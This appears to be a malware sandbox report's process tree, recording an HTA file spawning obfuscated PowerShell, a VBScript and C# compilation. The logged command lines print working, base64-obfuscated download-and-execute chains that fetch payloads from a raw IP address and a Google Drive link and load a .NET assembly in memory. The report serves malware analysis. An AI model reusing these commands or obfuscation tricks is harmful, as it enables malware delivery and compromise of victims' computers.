    "C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
      4⤵
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5604
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uaki0nqy\uaki0nqy.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA0F.tmp" "c:\Users\Admin\AppData\Local\Temp\uaki0nqy\CSCAA9675AB1787470C898BF0732593F4CF.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5316
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
      4⤵
      PID:3760
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5496
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5876
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\seethebestthingsevermeetwithgreatthingstobegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID:5756
- - C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe
    "C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
      4⤵
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5156
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\td0qadnj\td0qadnj.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5960
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC42.tmp" "c:\Users\Admin\AppData\Local\Temp\td0qadnj\CSC5E979B8D33D84AE282B7CEFB9FEF3.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5996
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
      4⤵
      PID:5584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:5644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:5620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:1556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2796

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3604

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4492

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\seethebestthingsevermeetwithgreatthingstobegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6092
- C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe
  "C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  PID:5148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
    3⤵
    - Evasion via Device Credential Deployment
    PID:5308
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wj4riz1m\wj4riz1m.cmdline"
    3⤵
    PID:6320
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1884.tmp" "c:\Users\Admin\AppData\Local\Temp\wj4riz1m\CSC398D3A59EBF44E8D856F2E713AFE734B.TMP"
      4⤵
      PID:6356
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
    3⤵
    PID:6640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
